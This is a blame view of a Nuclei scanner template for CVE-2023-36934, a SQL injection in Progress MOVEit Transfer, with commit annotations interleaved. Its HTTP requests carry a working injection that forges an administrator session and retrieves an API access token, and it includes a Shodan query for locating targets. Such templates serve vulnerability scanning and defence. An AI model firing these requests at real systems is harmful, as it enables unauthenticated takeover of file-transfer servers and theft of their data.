daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-36934.yaml

102 lines
4.4 KiB
YAML
Raw Normal View History

Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
id: CVE-2023-36934
info:
name: MOVEit Transfer - SQL Injection
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the MOVEit Transfer application.
Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
reference:
- https://community.progress.com/s/article/MOVEit-Transfer-2020-1-Service-Pack-July-2023
- https://blog.projectdiscovery.io/moveit-transfer-sql-injection/
- https://thehackernews.com/2023/07/another-critical-unauthenticated-sqli.html
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- https://www.progress.com/moveit
Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
classification:
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
cve-id: CVE-2023-36934
cwe-id: CWE-89
TemplateMan Update [Tue Nov 7 14:54:31 UTC 2023] :robot:
2023-11-07 14:54:31 +00:00
epss-score: 0.01606
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot:
2023-11-27 09:19:41 +00:00
epss-percentile: 0.86013
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
metadata:
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
verified: true
TemplateMan Update [Sun Jul 9 09:50:07 UTC 2023] :robot:
2023-07-09 09:50:07 +00:00
max-request: 4
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
vendor: progress
Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
product: moveit_transfer
TemplateMan Update [Sun Jul 9 09:50:07 UTC 2023] :robot:
2023-07-09 09:50:07 +00:00
shodan-query: http.favicon.hash:989289239
tags enhancements
2023-12-05 09:50:33 +00:00
tags: cve,cve2023,moveit,rce,sqli,intrusive,progress
Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
variables:
session_cookie: "{{randstr}}"
http:
- raw:
- |
POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
transaction=signon
- |
POST /human.aspx?ep={{url_encode(ep)}} HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: InitialPage=zzzz.aspx;
transaction=passchangerequest
- |
POST /machine.aspx HTTP/2
Host: {{Hostname}}
Cookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};
a=a
- |
POST /api/v1/auth/token HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId={{session_cookie}}
Content-Type: application/x-www-form-urlencoded
grant_type=session&username=x&password=x
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
- type: word
part: body_4
words:
- '"refresh_token"'
- '"access_token"'
- '"token_type"'
- '"expires_in"'
condition: and
- type: status
status:
- 200
Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
extractors:
- type: regex
name: ep
group: 1
regex:
- '\bep=([^&]+)"'
internal: true
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
part: body_1
Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
- type: regex
name: session
group: 1
regex:
- 'ASP.NET_SessionId=([^;]+)'
internal: true
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
part: header_2
Added CVE-2023-36934 (MOVEit Transfer - SQL Injection) (#7650)
2023-07-09 09:47:35 +00:00
- type: regex
group: 1
regex:
- '"access_token":"([^"]+)"'
part: body_4
Auto Template Signing [Wed Dec 6 05:59:55 UTC 2023] :robot:
2023-12-06 05:59:56 +00:00
# digest: 4a0a00473045022100b80bb3a8a5c8055bfdb3d79f321110e9d6faaf12e0804323a3232de61d711a810220234e07b26bee246592368a7770a7f9a421132f323c029f314ed4898483bb2ab9:922c64590222798bb761d5b6d8e72950